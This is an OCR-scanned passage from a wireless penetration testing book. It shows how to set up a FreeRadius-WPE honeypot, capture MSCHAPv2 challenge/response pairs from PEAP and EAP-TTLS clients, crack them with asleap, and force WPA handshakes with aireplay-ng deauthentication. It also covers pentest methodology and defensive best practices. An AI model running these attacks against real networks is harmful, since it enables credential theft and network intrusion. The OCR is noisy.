Client C8:BC:C8:EE:12:0B associated (WPA1;TKIP) to : "Wireless 
C8:BC:C8:EE:12:0B associated (WPA1;TKIP) to : "Wireless 
C8:BC:C8:EE:12:0B associated (WPA1;TKIP) to : "Wireless 








55V A 
We created multiple Honeypots with the same SSID but different security configurations. 


Depending on which configuration the client had stored for the Wireless Lab network, it 
connected to the appropriate one. 


This technique can come in handy as if you are doing a penetration test, you would not 
know which security configurations the client has on its laptop. This allows you to find the 
appropriate one by setting a bait for the client. This technique is also called WiFishing. 





Have a go hero — baiting clients 


Create different security configurations on the client for the same SSID and check if your set 
of Honeypots is able to detect them. 


It is important to note that many Wi-Fi clients might not actively probe for networks they 
have stored in their profile. It might not be possible to detect these networks using the 
technique we have discussed here. 





1. In an MITM attack, who is in the middle? 
a. The access point 
b. The attacker 
The Victim 


None of the above 


= 


ANE 


2. Dnsspoof: 
a. Spoofs DNS requests 
b. Spoofs DNS responses 
c. Needs to run on the DNS server 
d. Needs to run on the access point 


3. A wireless MITM attack can be orchestrated : 


a. 
b. 
C. 
d. 


4. The interface closest to the victim in our MITM setup is: 


a. 
b. 
C. 
d. 


OORT 


On all wireless clients at the same time 
Only one channel at a time 

On any SSID 

Both (b) and (c) 


AtO 
EthO 
BrO 
EnO 
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In this chapter, we have learned how to conduct advanced attacks using wireless as the base. 
We created a setup for a MITM over wireless and then used it to eavesdrop on the victim's 

traffic. We then used the same setup to hijack the application layer of the victim (web traffic 
to be specific) using a DNS poisoning attack. 


In the next chapter, we will learn how to conduct a wireless penetration testing right from 
the planning, discovery and attack to the reporting stage. We will also touch upon the best 
practices to secure WLANs. 











"The Bigger they are, the Harder they Fall." 


Popular Saying 
Q WPA-Enterprise has always had an aura of unbreakable around it. Most 
network administrators think of it as a panacea for all their wireless 
security problems. In this chapter, we will see that nothing could be 
further from the truth. 


Here we will learn how to attack the WPA-Enterprise using different tools and techniques 
available on BackTrack. 


We will cover the following in the course of this chapter: 


Setting up FreeRadius-WPE 
Attacking PEAP on Windows clients 
Attacking EAP-TTLS 


*« 9 9 9 


Security best practice for Enterprises 


We will need a Radius server for orchestrating WPA-Enterprise attacks. The most widely used 
open source Radius server is FreeRadius. However, setting it up is difficult and configuring it 
for each attack can be tedious. 


Attacking WPA-Enterprise and RADIUS 


Joshua Wright, a well-known security researcher created a patch for FreeRadius that makes 
it easier to set up and conduct attacks. This patch was released as the FreeRadius-WPE 
(Wireless Pwnage Edition). The good news is that this comes pre-installed with BackTrack 
and hence, we need not do any installations. 


Let us now first set up the Radius server on BackTrack. 





Time for action — setting up the AP with FreeRadius-WPE 


Follow the given instructions to get started: 


1. Connect one of the LAN ports of the access point to the Ethernet port on your 
machine running BackTrack. In our case, the interface is et h1. Bring up the interface 
and get an IP address by running DHCP as shown in the following screenshot: 


^ v X root@bt: ~ 
File Edit View Termina = 
root@bt:-# dhclient3 ethl 

Internet Systems Consortium DHCP Client V3.1.3 
Copyright 2004-2009 Internet Systems Consortium. 
ALL rights reserved. 


For info, please visit https://www.isc.org/software/dhcp/ 


He 


"2 
M 


Listening on LPF/eth1/08:00:27:c6:33:f9 
Sending on  LPF/eth1/08:00:27:c6:33:f9 


Sending on Socket/fallback 

DHCPDISCOVER on ethl to 255.255.255.255 port 67 interval 8 
DHCPOFFER of 192.168.0.198 from 192.168.0.1 

DHCPREQUEST of 192.168.0.198 on ethl to 255.255.255.255 port 67 





2. Login to the access point and set the Security Mode to WPA-Enterprise. Then, under 
the EAP (802.1x) section, enter the RADIUS server IP Address as 192.168.0.198. This 
is the same IP address allocated to our wired interface in step 1. The RADIUS server 
Shared Secret would be test as shown in the following screenshot: 


3. Let 
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WIRELESS SECURITY MODE 


To protect your privacy you can configure wireless security features. This device supports three wireless 
security modes, including WEP, WPA-Personal, and WPA-Enterprise. WEP is the original wireless 
encryption standard. WPA provides a higher level of security. WPA-Personal does not require an 
authentication server. The WPA-Enterprise option requires an external RADIUS server. 


Security Mode: | WPA-Enterprise + 


Use WPA or WPA2 mode to achieve a balance of strong security and best compatibility. This mode 
uses WPA for legacy clients while maintaining higher security with stations that are WPA2 capable. Also 
the strongest cipher that the client supports will be used. For best security, use WPA2 Only mode. 
This mode uses AES(CCMP) cipher and legacy stations are not allowed access with WPA security. For 
maximum compatibility, use WPA Only. This mode uses TKIP cipher. Some gaming and legacy devices 
work only in this mode. 


To achieve better wireless performance use WPA2 Only security mode (or in other words AES cipher). 


WPA Mode : 
Cipher Type : 


Group Key Update Interval: 3600 (seconds) 





EAP (802.1X) 


When WPA enterprise is enabled, the router uses EAP (802.1x) to authenticate clients via 
a remote RADIUS server. 





Authentication Timeout: 60 (minutes) 
RADIUS server IP Address: 192.168.0.198 — 
RADIUS server Port: 1812 
RADIUS server Shared Secret: esee 
MAC Address Authentication : V 


Advanced »» 


us now open a new terminal and go to the directory / usr/local/etc/raddb. 


This is where all the FreeRadius-WPE configuration files are: 


4i - View iem 


inal Hel 


root@bt: /usr/local/etc/raddb£ ls 


clients.conf huntgroups proxy.conf sqlippool.conf 
dictionary ldap.attrmap radiusd.conf templates.conf 


attrs.access reject eap.conf modules sites-available users 
attrs.accounting response example.pl policy.conf sites -enabled 


experimental.conf  policy.txt sql 
hints preproxy users sql.conf 


root@bt: /usr/local/etc/raddb# 


root@bt: /usr/local/etc/raddbf£ 
root@bt: /usr/local/etc/raddb£ 
root@bt: /usr/Local/etc/raddb# 
root@bt: /usr/Local/etc/raddb# J 
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4. Openeap. conf, you will find thatthedefault eap type issettopeap. Let us 


leave this as it is: 


* root@bt: /usr/local/etc/raddb 
eap ( 
default eap type = TIT: 
timer expire = 60 
ignore unknown eap types - no 
cisco accounting username bug - yes 
md5 ( 
) 
leap ( 
) 
gtc { 
auth type - PAP 


) 
tis ( 


private key password - whatever 
private key file - $(raddbdir)/certs/server.pem 
certificate file = ${raddbdir}/certs/server.pem 
CA file = $(raddbdir)/certs/ca.pem 

dh file = $(raddbdir)/certs/dh 

random file - $(raddbdir)/certs/random 

fragment size - 1024 

include length - yes 


default eap type - mschapv2 

#copy request to tunnel = no 

fuse tunneled reply = no 

proxy tunneled request as eap = yes 


) 
mschapv2 { 





5. Openclients.conf.Thisis where we define the allowed list of clients that can 
connect to our RADIUS server. As you can interestingly note, the secret for clients in 
the range192.168.0.0/16 defaults tot est . This is exactly what we used in step 2. 


* root@bt: /usr/local/etc/raddb 


client 192.168.3.4 ( 
secret - testingl23 


client 192.168.0.0/16 ( 
secret = test 
shortname = testAP 


172.16.0.0/12 { 
secret test 
shortname testAP 


10.0.0.0/8 { 
secret test 
shortname testAP 


test 
testAP 
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6. Weare now all set to start the Radius server witharadi usd -s -X: 


* root@bt: /usr/local/etc/raddb 


Cila TH. ETE 21222112 121 "MEM 
File Edit View Terminal Help 


roote@bt: /usr/local/etc/raddb£ radiusd -s - 





7. Once you run this, you will see a lot of debug messages on the screen, but 
eventually the server will settle down to listen for requests. Awesome! The setup is 
now ready to start the lab sessions in this chapter: 


e Edit View Terminal Help 


attr_filter attr_filter.accounting_response { 
attrsfile = "/usr/local/etc/raddb/attrs.accounting_response" 
key = "%{User-Name}" 


Module: Checking session {...} for more modules to load 
Module: Checking post-proxy {...} for more modules to load 
Module: Checking post-auth {...} for more modules to load 
) # modules 

) # server 

radiusd: #### Opening IP addresses and Ports #### 


"control" 
listen { 
socket - "/usr/local/var/run/radiusd/radiusd.sock" 
) 


Listening on authentication address * port 1812 

Listening on accounting address * port 1813 

Listening on command file /usr/local/var/run/radiusd/radiusd.sock 
Listening on proxy address * port 1814 

Ready to process requests. 


[7] root@bt: /usr/local/etc/... 





OOK 
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We have successfully set up FreeRadius-WPE. We will use this in the rest of the experiments 
that we will do in this chapter. 


FreeRadius-WPE has tons of options. It may be a good idea to familiarize yourself with them. 
Most importantly, take time to check-out the different configuration files and how they all 
work together. 











Protected Extensible Authentication Protocol (PEAP) is the most popular version of EAP in 
use. This is the EAP mechanism shipped natively with Windows. 


PEAP has two versions: 


1. PEAPvO with EAP-MSCHAPv2 (most popular as this has native support on Windows) 
2. PEAPv1 with EAP-GTC 


PEAP uses server-side certificates for validation of the Radius server. Almost all attacks on 
PEAP leverage mis-configurations in certificate validation. 


In the next lab, we will look at how to crack PEAP, when certificate validation is turned off on 
the client. 





Time for action - cracking PEAP 


Follow the given instructions to get started: 


1. We double-check the eap. conf file to ensure that PEAP is enabled: 


* roote@bt: ~ 


timer_expire = 60 
ignore_unknown_eap_types = no 

cisco accounting username bug = yes 
md5 ( 

) 

leap { 

} 


gtc { 
auth type = PAP 


} 
tls { 


private_key_password = whatever 
private key file = ${raddbdir}/certs/server.pem 
certificate file = ${raddbdir}/certs/server.pem 
CA_file = ${raddbdir}/certs/ca.pem 

dh_ file = ${raddbdir}/certs/dh 

random_file = ${raddbdir}/certs/random 
fragment_size = 1024 

include length = yes 


default _eap type = mschapv2 
#copy_request_to_ tunnel = no 

fuse tunneled reply = no 

#proxy tunneled request as eap = yes 


} 
mschapv2 { 
} 


2. \We then restart the Radius server with Radi usd -s -X: 


* root@bt: /usr/local/etc/raddb 
attrsfile = "/usr/local/etc/raddb/attrs.accounting response" 
key = "*(User-Name]" 


Module: Checking session {...} for more modules to load 
Module: Checking post-proxy (...) for more modules to load 
Module: Checking post-auth {...} for more modules to load 
) * modules 

) # server 

radiusd: #### Opening IP addresses and Ports #### 
listen ( 

"auth" 


Listening on authentication address * port 1812 

Listening on accounting address * port 1813 

Listening on command file /usr/local/var/run/radiusd/radiusd.sock 
Listening on proxy address * port 1814 

Ready to process requests. 
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3. We monitor the log file created by FreeRadius-WPE: 


x root@bt: ~ 


File Edit ew Terminal Help 


V 


root@bt:-# tail /usr/local/var/log/radius/freeradius-server-wpe.log -n 0 -f 





4. Windows has native support for PEAP. Let's ensure that Certificate Verification has 
been turned off: 


Protected EAP Pro perties 


When connecting: 


| Validate server certificate 


Connect to these servers: 


[v] Class 3 Public Primary Certification Authority 
[V] GTE CyberTrust Global Root 

[F] http://www. valicert.com/ 

[4] Microsoft Root Authority Ds 

[4| Microsoft Root Certificate Authority 


[4| Thawte Timestamping CA 


Do not prompt user to authorize new servers or trusted 
certification authorities. 


Select Authentication Method: 


[Secured password (EAP-MSCHAP v2) | | configure... | 


[V] Enable Fast Reconnect 

|. | Enforce Network Access Protection 

| | Disconnect if server does not present cryptobinding TLV 
| | Enable Identity Privacy 


pm 





exce 
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5. We just need to connect to the access point Wireless Lab for Windows to start 
PEAP authentication: 


Currently connected to: 


g Network 
^8 Internet access 


Se Unidentified network 
— No network access 


Wireless Network Connection 


Wireless Lab 


Connect automatically 


Vivek 


Janet 


Open Network and Sharing Center 
ER 949PM | 
E " 1] 
BEEN E 0. ansa 


6. Once the client connects to the access point, the client is prompted for a User name 
/ Password. We use SecurityTube as the User name and abcdefghi as the Password: 





Windows Security 


Network Authentication 


Please enter user credentials 


| User name 


| Password 





caca 
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7. As soon as we do this, we are able to see the MS CHAP- v2 challenge response 
appear in the log file: 


* root@bt: ~ 
File Edit View Terminal Help 


root@bt:-# tail -f /usr/local/var/log/radius/freeradius-server-wpe.log -n 0 
mschap: Tue Aug 2 04:18:54 2011 


username: SecurityTube 


challenge: b0:f3:c2:a3:06:0c:94:f5 
response: b0:c8:dc:06:1f:9d:c2:bc:35:7d:f2:5b:48:2a:99:58:85:10:04:54:98:ca:04:f9 


IAC 
\root@bt: ~# 








8. We now use Asl eap to crack this using a password list file that contains the 
password abcdef ghi and we are able to crack the password! 


x root@bt: ~ 
File Edit View Terminal Help 
root@bt:-# tail -f /usr/local/var/log/radius/freeradius-server-wpe.log -n 0 
mschap: Tue Aug 2 04:18:54 2011 


username: SecurityTube 
challenge: b0:f3:c2:a3:06:0c:94:f5 
response: b0:c8:dc:06:1f:9d:c2:bc:35:7d:f12:5b:48:2a:99:58:85:10:04:54:98:ca:04:f9 


^t 
rootGbt:-£ asleap -C b0:f3:c2:a3:06:0c:94:f5 -R b0:c8:dc:06:1f:9d:c2:bc:35:7d:f2:5b:48:2a:99:58: 
85:10:04:54:98:ca:04:f9 -W list 


asleap 2.2 - actively recover LEAP/PPTP passwords. «jwrightghasborg.com» 
Using wordlist mode with "list". 

hash bytes: 9052 

NT hash: e18614f7c6811f043fbf54205e929052 


password: abcdefghi 





Heeck 
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We set up our Honeypot using FreeRadius-WPE. The enterprise client is mis-configured to 
not use certificate validation with PEAP. This allows us to present our own fake certificate to 
the client, which it gladly accepts. Once this happens, MSCHAP- v2 the inner authentication 
protocol kicks in. As the client uses our fake certificate to encrypt the data, we are easily able 
to recover the username / challenge / response tuples. 





MSCHAP- v2 is prone to dictionary attacks. We use Asleap to crack the challenge / response 
pair as it seems to be based out of a dictionary word. 





PEAP can be mis-configured in multiple ways. Even with certificate validation enabled, if the 
administrator does not mention the authentic servers in Connect to these servers list, the 
attacker can obtain a real certificate for another domain from any of the listed certifying 
authorities. This would still be accepted by the client. There are other variations of this 
attack possible as well. 


We will encourage the reader to explore different possibilities in this section. 


Attacking EAP-TTLS 


In EAP-Tunneled Transport Layer Security (EAP-TTLS), the server authenticates itself with 
certificate. The client can optionally use certificate as well. Unfortunately, this does not have 
native support on Windows and we need to use third party utilities. 


There are multiple inner authentication protocol options we can use with EAP-TTLS. The 
most common one is again MSCHAP-v2. 


As Windows does not natively support EAP-TTLS, we will use OS X in this demonstration. 


AK 
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Time for action — cracking EAP-TTLS 


Follow the given instructions to get started: 


1. EAP-TTLS is also enabled by default in eap. conf . Let us start the Radius server and 
monitor the log file: 


attrsfile = "/usr/local/etc/raddb/attrs.accounting response" 
key = "4(User-Name]" 


x root@bt: ~ 


„| root@bt:-# tail -f /usr/local/var/log/radius/freeradius-server-wpe.log -n 0 





2. We connect the client and enter the credentials SecurityTube as the Username and 
demo12345 as the Password: 


— The Wi-Fi network "SecurityTube" requires WPA2 
— enterprise credentials. 


Username: SecurityTube 


Password:|seeeeeeee —8 


_| Show password 
ví Remember this network 


< Connecting... 


Cancel 





OMA 
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3. Immediately, the MS CHAP- v2 challenge / response appears in the log file: 


x root@bt: ~ 
File Edit View Terminal Help 
root@bt:-# tail -f /usr/local/var/log/radius/freeradius-server-wpe.log -n 0 
mschap: Tue Aug 2 04:09:11 2011 


username: SecurityTube 
challenge: 0f:18:77:8f:4c:02:c3:90 
response: 12:ef:10:7e:70:35:12:95:4a:51:8e:5f:f2:e5:5e:39:6d: 4a: ff:b7:41:87:14:76 





4. \Neagain use Asleap to crack the password used. It is important to note that any 
password list you use, must contain the password used by the user. In order to 
illustrate that if this is not true, we will not be able to crack the password, 
we have deliberately ensured that the password is not there in the default list 
on BackTrack: 


^ v X root@bt: ~ 
File Edit View Terminal Help 


root@bt:-# asleap -C 0f:18:77:8f:4c:02:c3:90 -R 12:ef:10:7e:70:35:12:95:4a:51:8e:5f:f2:e5:5e:39: * 
6d:4a:ff:b7:41:87:14:76 -W list 
laasleap 2.2 - actively recover LEAP/PPTP passwords. <jwright@hasborg. com> 
Using wordlist mode with "list". 
hash bytes: f37e 
NT hash: b486eb4a83bea2497df401405ba8f37e 
password: demo12345 








K FEV OA RT Hh 
Cracking EAP-TTLS is almost identical to PEAP. Once the client accepts our fake certificate, 
we get the MSCHAP-v2 challenge / response pair. As MSCHAP-v2 is prone to dictionary 


attacks, we use Asleap to crack the challenge / response pair as it seems to be based out of a 
dictionary word. 





Have a go hero — EAP-TTLS 


We would encourage you to try attacks, similar to what we have suggested for PEAP against 
EAP-TTLS. 


Attacking WPA-Enterprise and RADIUS 


security best practices for Enterprises 


We have seen a ton of attacks against WPA/WPA2, both Personal and Enterprise. Based on 
our experience, we would recommend the following: 


1. For SOHOs and medium-sized businesses, use WPA2-PSK with a strong passphrase. 
You have up to 63 characters at your disposal. Make use of it. 


2.  Forlarge enterprises, use WPA2-Enterprise with EAP-TLS. This uses both client and 
server-side certificates for authentication, and currently is unbreakable. 


3. |f you have to use PEAP or EAP-TTLS with WPA2-Enterprise, then ensure that 
certificate validation is turned on, the right certifying authorities are chosen, the 
Radius servers that are authorized are used and finally any setting that allows users 
to accept new Radius servers, certificates, or certifying authorities is turned off. 





Pop quiz — attacking WPA-Enterprise and RADIUS 
1. FreeRadius-WPE is a: 


Radius server written from scratch 


a 
b. Patch to the FreeRadius server 


e 


Ships by default on all Linuxes 


d. None ofthe above 


2. PEAP can be attacked using: 
a. Fake credentials 
b. Fake certificates 
Using WPA-PSK 
d. Allofthe above 


p 


3. EAP-TLS uses: 
a. Client-side certificates 
b. Server-side certificates 
c. Either (a) or (b) 
d. Both (a) and (b) 
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4. EAP-TTLS uses: 


a. 
b. 
C. 
d. 


OOO 


Client-side certificates only 
Server-side certificates 
Password-based authentication 
LEAP 


1. In this chapter, we saw how we could compromise the security of a WPA-Enterprise 
network running PEAP or EAP-TTLS, the two most common authentication 
mechanisms used in Enterprises. 


2. Inthe next chapter, we will look at how to put all that we have learned into use 
during an actual penetration test. 


OMX 
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"The Proof is in the Pudding." 


Popular Saying 
= In the last eight chapters, we have covered a lot of ground. 


Now it's time to put all that learning to the test! 


In this chapter, we will learn how to conduct a WLAN penetration test using all the concepts 
we have learned. We will explore a client's network and then systematically conduct the 
penetration test in various stages. 


* GEAR HE VIVI VE AVE 


Wireless penetration testing methodology is no different from the wired world one. The 
differences lie in the actual techniques used to conduct activities in various phases. Those 
with some experience in wired world penetration testing will feel right at home. For those 
who haven't, don't worry; you will pick this up very fast! 


Broadly, we can break up a wireless penetration testing exercise into the following phases: 


1 
2 
9. 
4 


Planning phase 
Discovery phase 
Attack phase 
Reporting phase 


We will now look at each of these phases separately. 


WLAN Penetration Testing Methodology 


UA 
oe 
In this phase, we understand the following: 
1. Scope of the assessment: The client employing the penetration tester will be the 


one to define the scope of the assessment. Typically, the following information 
is gathered: 


a Location of the penetration test 
a Total coverage area of the premises 
a Approximate number of access point and wireless clients deployed 
a Which wireless networks are included in the assessment? 
a Should a full proof of concept for vulnerability be done, or should it just 
be informed? 
2. Effort estimation: Once the scope is clear the penetration tester will have to do an 
effort estimation for the entire activity. This will consist of the following: 
a The number of days available for the penetration test 
a Number of man hours that may be required for the job 
a Depth of penetration test based on the requirements 
3. Legality: Penetration tests are a serious affair and things can go terribly wrong at 
times. Hence, it is important to have an indemnity agreement in place, which ensures 
that the penetration tester or his company is not held liable for damages resulting 
from this test. Also, at times clients might require you to sign a Non Disclosure 
Agreement (NDA) to ensure that the data you gather and the results from the 
penetration test are private and cannot be disclosed to any third party. In addition, 
you must make yourself aware of local laws that might govern the allowed channels 


and power levels. It is important to ensure that no local laws are broken during the 
penetration test. 


Once all of the preceding is in place, we are ready to go! 


Discovery 


In this phase, we will scan the airspace and find different access points and clients in 
the vicinity. 


So, let's get started! 


AK 
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Time for action — discovering wireless devices 


Follow the given instructions to get started: 


1. Create a monitor mode interface using your card as shown in the following screenshot: 


root@bt: ~ - Shell - Konsole 
Session Edit View Bookmarks Settings Help 


rootabt:-# ifconfig -a 

eth Link encap:Ethernet HWaddr 08:00:27:1a:1f:c2 
BROADCAST MULTICAST MTU:1500 Metric:1 
RX packets:0 errors:0 dropped:0 overruns:0 frame:0 
TX packets:0 errors:0 dropped:0 overruns:0 carrier:0 
collisions:0 txqueuelen:1000 
RX bytes:0 (0.0 B) TX bytes:0 (0.0 B) 


Link encap:Local Loopback 

inet addr:127.0.0.1 Mask:255.0.0.0 

UP LOOPBACK RUNNING MTU:16436 Metric:1 

RX packets:0 errors:0 dropped:0 overruns:0 frame:0 
TX packets:0 errors:0 dropped:0 overruns:0 carrier:0 
collisions:0 txqueuelen:0 

RX bytes:0 (0.0 B) TX bytes:0 (0.0 B) 


Link encap:Ethernet HWaddr 00:c0:ca:3e:bd:93 
BROADCAST MULTICAST MTU:1500 Metric:1 

RX packets:0 errors:0 dropped:0 overruns:0 frame:0 
TX packets:0 errors:0 dropped:0 overruns:0 carrier:0 
collisions:0 txqueuelen:1000 

RX bytes:0 (0.0 B) TX bytes:0 (0.0 B) 


rootabt:-# ifconfig wlan0 up 
rootabt:-# airmon-ng start wlan 
Chipset Driver 


RTL8187 rtl8187 - [phy0] 
(monitor mode enabled on mon0) 





2. Useairodump- ng to start scanning the airspace. Ensure that channel hopping 
happens across both the 802. 11 b and g bands: 


root@bt: ~ - Shell - Konsole 
Session Edit View Bookmarks Settings Help 


root@bt:~# airodump-ng --band bg --cswitch 1 mono 
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3. Move around the premises to get as many clients and access points as possible: 


root@bt: ~ - Shell - Konsole 
Edit View Bookmarks Settings Help 





][ Elapsed: 52 s ][ 2011-04-28 10:32 


PWR Beacons #Data, #/s CH MB ENC CIPHER AUTH ESSID 


56 54 WPA vivek 
103 54e. WPA Wireless Lab 
26 54e WPA Sunny 
-1 WPA «length: 0» 
54 . WPA tata 


STATION Rate Lost Packets Probes 


15 vivek 
7 
14 Vivek 
29 Wireless Lab,Vivek 


C8:BC:C8:EE:12:0B 36 - 1 0 
70:F1:A1:84:29:1A 54 -48 0 
00:22:FB:35:FC:44 48e-12e 0 
60:FB:42:D5:E4:01 0 - le 0 


rootebt:~# J 





4. Request from the system administrator of the company a list of MAC addresses for 
all access points and wireless clients. This will help us in the next phase: 


root@bt: = - Shell - Konsola 


Session Edit View Bookmarks ‘Settings Help 


CH 10 ][ Elapsed: 56 s ][ 2011-04-28 10:35 


BS5SID PWR  Beacons Data, Z/s 


Fi 
= 


MB ENC CIPHER AUTH ESSID 


88:22: 
00:21: 
00:1E: 
80:72: 
40:4A;:; 
88:25: 
08:25: 
00:17: 
80:75: 
80:75: 
88:24: 
00:75: 
00:25: 
80:25: 
00:25: 
BB8:25:5E: 
08:724: 
00:22: 
00:25: 
00:25: 
AC:67: 
00:22: 


es 
a 
eo 


-l WPA «length: 8» 
54e. WPA Wireless Lab 
54 WPA vivek 

54 . WEP brindavan 

54 , WPA tata 

54 OPN «length: 8» 
54 WEP Airtel 

54e WPA Sunny 

54 OPN «length: 0» 
54 OPN «length: o> 
54e WPA2 FinAirWifi 
54 OPN elength: 05 
54 WEP Airtel 

54 — WEP Hissaria's 
54 OPN length: 0> 
54 OPN «length: 8» 
54e WPAZ CCMP New NETGEAR 
-1 OPN «length: > 
54 OPN «length: > 
54 — OPN «length: 8» 
-1 OPN «length: 8» 
-1 WPA «length: > 


ug RB CO C uU?" CO (0D CD CD CO CD CD CD CD CD CD CD CD CD CO = b 
cQ rococOcOOOcOOococOcococooo0caocoomnso 
RÀ pu duh ed eo de eA el ee CR. E CA ei 


D © 6 LO CO Lm Lu Cm B BJ un Cn uD CO d LM ÀJ 


B55ID STATION | Lost Packets Probes 
| (not associated)  C8:BC:C8: vivek 
(not associated) — 00:14:45: 
(not associated)  00:22:7F: 
08:21:91:D2:8bE:25  080:22:FB:35:FC: 54e-54e 
00:21:91:D2:8E:25 66: FR:42: 05:84: ð - le 
B80:1E:480:53:07:FC  78:F1:A1:84:20: B4 - 1 
40:4A:03:AB:EB:;EZ 78:E4:00:51:98:; B-1 
B8:22:7F:25:0A:99  80:24:2B:64:DF: l-8 
AC:67:06:32:AC:99 00:21:50: B1:B9: le- ü 


Hesh-320833880058-12 
Vivek 
Wireless Lab,Vivek 


BS d un Lm R3 RS un 


rootgbt:-X | 
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We took a scan of the entire wireless network in the area. This now gives us a clear idea 
about what is in the air. This is the starting point of the exercise. Now we will analyze this 
dump and do an actual penetration attack in the Attack phase. 





WK 


Now that we understand what is in the airspace of the authorized network, we need to break 
the problem into smaller parts. 


In our attacking phase, we will explore the following: 


Finding rogue access points 


Finding client mis-associations 


Cracking the encryption 


* 

* 

€ Finding unauthorized clients 

* 

€ Breaking into the infrastructure 
* 


Compromising clients 


*3B EE CLEA ERK AAT 
The administrator has provided us with the list of MAC addresses of authorized clients and 
access points: 


Authorized Access Point: 


€ ESSID: Wireless Lab 
@ MACAddress:00:21:91: D2: 8E: 25 
€ Configuration: WPA- PSK 


Authorized Clients: 
@ MACAddress:60: FB: 42: D5: E4:01 


We will now use this list to find rogue access points in the system. 


AON K 
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Time for action — finding rogue access points 


Follow the given instructions to get started: 





1. Wedumpa list of all MAC addresses on the switch of the clients network. In the 
most common case, the wired and wireless interface MAC addresses differ by 1. 
We find the following list of addresses on the switches: 00: 21: 91: D2: 8E: 26 and 
00:24: B2: 24: TE: BF that are close to the ones we saw in the air. 


2. These are close to the access points as shown in the screenshot: 


ng root@bt: ~ - Shell - Konsole 


Session Edit View Bookmarks Settings Help 
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PWR Beacons #Data, #/s 


e 
X 


CIPHER AUTH ESSID 


-1 
-24 
-58 
-64 
-65 
-67 
-67 
-67 
-68 
-68 
-68 
-69 
-69 
-69 
-70 
-70 
-70 
-71 
-71 
-71 
-72 

-1 
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«length: 0» 
PSK Wireless Lab 
PSK vivek 
brindavan 
PSK tata 
«length: 0» 
Airtel 
PSK Sunny 
«length: 0» 
«length: 0» 
WPA2 CCMP FinAirWifi 
OPN «length: 0» 
WEP WEP Airtel 
WEP WEP Hissaria's 
OPN «length: 0» 
OPN «length: 0> 
WPA2 CCMP New NETGEAR 
OPN «length: 0» 
OPN «length: 0» 
OPN «length: 0» 
OPN «length: 0» 
WPA «length: 0» 
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3. This brings us to the conclusion that the access point with ESSID New NETGEAR 
and wireless MAC address 00: 24: B2: 24: 7E: BE and wired-side MAC address 
00: 24: B2: 24: TE: BF is a rogue device: 


AKA 


Chapter 9 


root@bt: ~ - Shell - Konsole 
Edit View Bookmarks Settings Help 


][ Elapsed: 56 s ][ 2011-04-28 10:35 


PWR Beacons #Data, #/s 


e 
<= 


CIPHER AUTH ESSID 


-1 
-24 
-58 
-64 
-65 
-67 
-67 
-67 
-68 
-68 
-68 
-69 
-69 
-69 
-70 
-70 
-70 
-71 
-71 
-71 
-72 

-1 
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«length: 0» 

TKIP PSK Wireless Lab 

TKIP PSK vivek 

WEP brindavan 

TKIP PSK tata 
«length: 0> 

WEP Airtel 

TKIP PSK Sunny 
«length: 0» 
«length: 0» 

CCMP FinAirWifi 
«length: 0» 

WEP Airtel 

WEP Hissaria's 
«length: 0» 
«length: 0» 
New NETGEAR 
«length: 
«length: 
«length: 
«length: 
«length: 
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4. \Nenow use various commands on the network switch to find out which physical 
port it is connected to on the corporate network, and remove it. 





K 39:9 AV? T Hh 
We detected a rogue access point on the network using a simple MAC address matching 
technique. It is to be noted that it might be possible to beat this approach and hence, this is 
not fool proof. In order to detect rogue access points deterministically, we will need to use 
wireless intrusion prevention systems, which use a variety of techniques by sending crafted 
packets to detect rogue access points. 


+E COV Gs 2E 
One of the key concerns is an unauthorized client connecting to the corporate network. 


These may have been brought in by employees or someone may have broken into the 
network. In this section, we will look at how to find unauthorized clients: 


WLAN Penetration Testing Methodology 


Time for action — unauthorized clients 


Follow the given instructions to get started: 





1. We look at the client part of the ai rodump- ng output: 


BSSID STATION PWR Rate Lost Packets Probes 
(not associated) :BC:C8:EE:12: -19 vivek 
(not associated) :14:45:AC:42: -62 
(not associated) :22:7F:28:23: -68 
00:21:91:D2:8E:25 :22: FB: 35: FC: -25 
00:21:91:D2:8E:25 :FB:42:D5:E4: -73 
00:1E:40:53:02:FC :F1:A1:84:29: -48 
40:4A:03:AB:EB:E2 

00:22:7F:25:0A:99 :24:2B:64:DF: -1 
AC:67:06:32:AC:99 :21:5C:81:B9: -1 


e 


Mesh-320833000058-12 
Vivek 
Wireless Lab, Vivek 
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2. Wecanclearly see that a client with MAC address is associated with the authorized 
access point, even though it is not part of the corporate network: 


BSSID STATION Rate Lost Packets Probes 
(not associated) vivek 
(not associated) 
(not associated) :22:7F:28:23: Mesh-320833000058- 12 
:91:D2:8E:25 :22:FB:35:FC: 54e-5 


Wireless Lab, Vivek 


00:1E:40:53:02:FC 
40:4A:03:AB:EB:E2 
:22:7F:25:0A:99 


0 
0 
0 
4 
00:21:91:D2:8E:25 :FB:42:D5:E4: 0 
4 
0 
1 
:06:32:AC:99 1 
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3. Thisclearly allows us to locate unauthorized clients connected to the network. 






? ' 9, «fa Tp. 
EV OAV IE T Es 
We used al rodump- ng to find unauthorized clients connected to authorized access 


points. This points to the fact that either an authorized user is using a foreign client or an 
unauthorized user has managed to gain access to the network. 


SSSR ERK Vik HET OVE 
Now let's look at the authorized network and see if we can break the WPA network key. We 


see that the encryption of the network is WPA-PSK, this is a bad sign by itself. Let us try a 
simple dictionary attack to check the strength of the passphrase chosen. 


HOKE 
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Time for action - cracking WPA 


Follow the given instructions to get started: 


1. Letusnowrunai rodump- ng targeting the Wi rel ess Lab access point by using a 


BSSID-based filter: 


Session Edit View Bookmarks 


root@bt:~# airodump-ng --channel 1 --bssid 00:21:91:D2:8E:25 --write WPA-PSK monoj 


Settings 


Help 


root@bt: ~ - Shell - Konsole 





2. airodump- ng starts collecting the packets and waits for the WPA handshake: 


Session Edit View Bookmarks 


Settings Help 





CH 1 ][ Elapsed: 16 s ][ 2011-04-28 13:45 


BSSID 


00:21:91:D2:8E:25 


BSSID 


00:21:91:D2:8bE:25 00:22:FB:35:FC:44 -20 


PWR RXQ Beacons 


-29 96 


STATION 


149 


root@bt: ~ - Shell - Konsole 


#Data, #/s CH MB 


30 


PWR Rate 


1 


1 54e. WPA TKIP 


ENC CIPHER AUTH ESSID 


PSK Wireless Lab 


Lost Packets Probes 


48e-12e 
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3. Luckily, there is a connected client and we can use a de-authentication attack to 


speed things up: 


Lr o root@bt: ~ - Shell No. 2 - Konsole 
Session Edit View Bookmarks Settings Help 


root@bt:~# aireplay-ng --deauth 0 -a 00:21:91:D2:8E:25 mond 

13:46:01 Waiting for beacon frame (BSSID: 00:21:91:D2:8bE:25) on channel 1 
NB: this attack is more effective when targeting 

a connected wireless client (-c <client's mac>). 
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BSSID: 
BSSID: 
BSSID: 
BSSID: 
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4. Now, we have captured a WPA handshake: 


Lr root@bt: ~ - Shell - Konsole 


